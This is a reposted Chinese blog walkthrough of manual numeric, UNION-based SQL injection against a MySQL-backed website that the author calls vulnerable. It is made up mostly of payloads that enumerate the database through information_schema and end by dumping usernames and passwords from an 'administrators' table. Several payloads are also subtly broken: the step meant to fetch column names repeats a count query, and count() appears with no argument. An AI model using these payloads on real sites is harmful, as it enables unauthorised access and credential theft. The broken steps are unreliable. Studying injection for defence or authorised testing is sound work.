记手工SQL数字回显型注入
2021-08-19 11:04:55 Author: mp.weixin.qq.com(查看原文) 阅读量:29 收藏

文章来源: 火线Zone

前言

已经检测出该网站有sql注入问题,试着手工注入网站,顺便再复习一下。

01

正文

1.先通过引号 判断该网站为数字型,payload直接拼接,无需引号闭合,当网站后直接构造拼接 and 0# 网站文章列表内容受到影响显示空白,此为回显类型注入

payload:and 0#

2.进行字段数的猜解,确定回显位

字段数猜解通过payload:ORDER BY X # 对X字段进行回显字段值猜解,此网站X=6时,网站显示正常则确定回显字段数为6

构造payload:UNION SELECT 1,2,3,4,5,6# 确定回显位为2,6选择其一即可

确定回显位:payload:UNION SELECT 1,2,3,4,5,6#

3.进网站进行信息收集payload:UNION SELECT 1,database(),3,4,5,6# 对第二位字段进行函数替换可收集网站数据库相关信息如:version() 数据库版本信息 @@basedirmysql安装路径等

4.获取表数量,通过上一步得到mysql数据库版本大于5.1,可以通过MySQL的information_schema数据库进行数据获取

payload:UNION SELECT 1,count(),3,4,5,6 FROM information_schema.tables WHERE table_schema=database() #

5.获取表名

payload:UNION SELECT 1,GROUP_CONCAT(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema=database() #

6.获取数据库表字段数

payload:UNION SELECT 1,count(),3,4,5,6 FROM information_schema.columns WHERE table_schema=database() and table_name='administrators' #

7.获取数据库表字段名

payload:UNION SELECT 1,count(*),3,4,5,6 FROM information_schema.columns WHERE table_schema=database() and table_name='administrators' #

8.获取表数据

payload:UNION SELECT 1,group_concat(concat(id,name,password)),3,4,5,6 FROM administrators LIMIT 0,1 #

说明

以mysql数据库,数字回显类型进行sql手工注入流程,仅供参考

侵权请私聊公众号删文


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650520620&idx=3&sn=6596c0277c6787f36e027746a0187762&chksm=83bad9c8b4cd50de0e55f6785b5e875163a37c1eceefda30cca2289d681666c5a2cb10717ad0#rd
如有侵权请联系:admin#unsafe.sh